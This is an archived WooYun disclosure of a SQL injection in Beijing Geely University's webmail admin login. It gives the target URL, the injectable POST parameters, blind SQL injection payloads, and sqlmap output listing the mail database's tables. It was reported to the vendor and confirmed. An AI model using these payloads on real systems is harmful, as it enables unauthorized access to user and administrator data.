当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-053888

漏洞标题:北京吉利大学某重要内部系统注入漏洞

相关厂商:bgu.edu.cn

漏洞作者: Mr .LZH

提交时间:2014-03-17 17:50

修复时间:2014-05-01 17:51

公开时间:2014-05-01 17:51

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-03-17: 细节已通知厂商并且等待厂商处理中
2014-03-17: 厂商已经确认,细节仅向厂商公开
2014-03-27: 细节向核心白帽子及相关领域专家公开
2014-04-06: 细节向普通白帽子公开
2014-04-16: 细节向实习白帽子公开
2014-05-01: 细节向公众公开

简要描述:

北京吉利大学某重要内部系统注入漏洞。通用型系统,新版本不存在注入问题,老版本存在,谷歌关键字显示老版本用户现在很少,不超过1000,既然用户少,就不发通用型漏洞了。直接给北京吉利大学报平安。PS:看到北京吉利大学发礼物就赶来了,没想到撞到大系统。

详细说明:

后台管理登录框存在注入。
漏洞地址:mail.bgu.edu.cn:80/webmail/admin/index.php?action=login&module=user&return=/webmail/admin/
post数据:domain=bgu.edu.cn&password=test&username=test
注入参数:domain,username

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: domain
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: domain=bgu.edu.cn' AND 8760=8760 AND 'yeJu'='yeJu&password=e&username=e
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: domain=bgu.edu.cn' AND SLEEP(5) AND 'LRQG'='LRQG&password=e&username=e
---
Database: umail
[32 tables]
+---------------------+
| admin_domain_prefs  |
| admin_log           |
| admin_users         |
| client_calendar     |
| client_fetchmail    |
| client_letter_paper |
| client_nd_files     |
| client_nd_folder    |
| client_note_cate    |
| client_note_content |
| client_pab_contact  |
| client_pab_group    |
| client_pab_map      |
| client_score_stat   |
| client_score_type   |
| client_signature    |
| client_user_apply   |
| client_user_info    |
| client_user_prefs   |
| collect             |
| company_department  |
| company_dept_map    |
| company_dept_permit |
| company_info        |
| core_alias          |
| core_alias_domain   |
| core_domain         |
| core_mailbox        |
| core_maillist       |
| core_members        |
| core_replylog       |
| core_response       |
+---------------------+


先爆个管理用户,看看后台:

QQ截图20140317163448.png


再爆一下管理员他的邮箱:

QQ截图20140317163412.png

漏洞证明:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: domain
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: domain=bgu.edu.cn' AND 8760=8760 AND 'yeJu'='yeJu&password=e&username=e
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: domain=bgu.edu.cn' AND SLEEP(5) AND 'LRQG'='LRQG&password=e&username=e
---
Database: umail
[32 tables]
+---------------------+
| admin_domain_prefs  |
| admin_log           |
| admin_users         |
| client_calendar     |
| client_fetchmail    |
| client_letter_paper |
| client_nd_files     |
| client_nd_folder    |
| client_note_cate    |
| client_note_content |
| client_pab_contact  |
| client_pab_group    |
| client_pab_map      |
| client_score_stat   |
| client_score_type   |
| client_signature    |
| client_user_apply   |
| client_user_info    |
| client_user_prefs   |
| collect             |
| company_department  |
| company_dept_map    |
| company_dept_permit |
| company_info        |
| core_alias          |
| core_alias_domain   |
| core_domain         |
| core_mailbox        |
| core_maillist       |
| core_members        |
| core_replylog       |
| core_response       |
+---------------------+


QQ截图20140317163448.png


QQ截图20140317163412.png

修复方案:

更新版本
拒绝小厂商

版权声明:转载请注明来源 Mr .LZH@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-03-17 20:26

厂商回复:

非常感谢,我们会尽快修复该漏洞!

最新状态:

暂无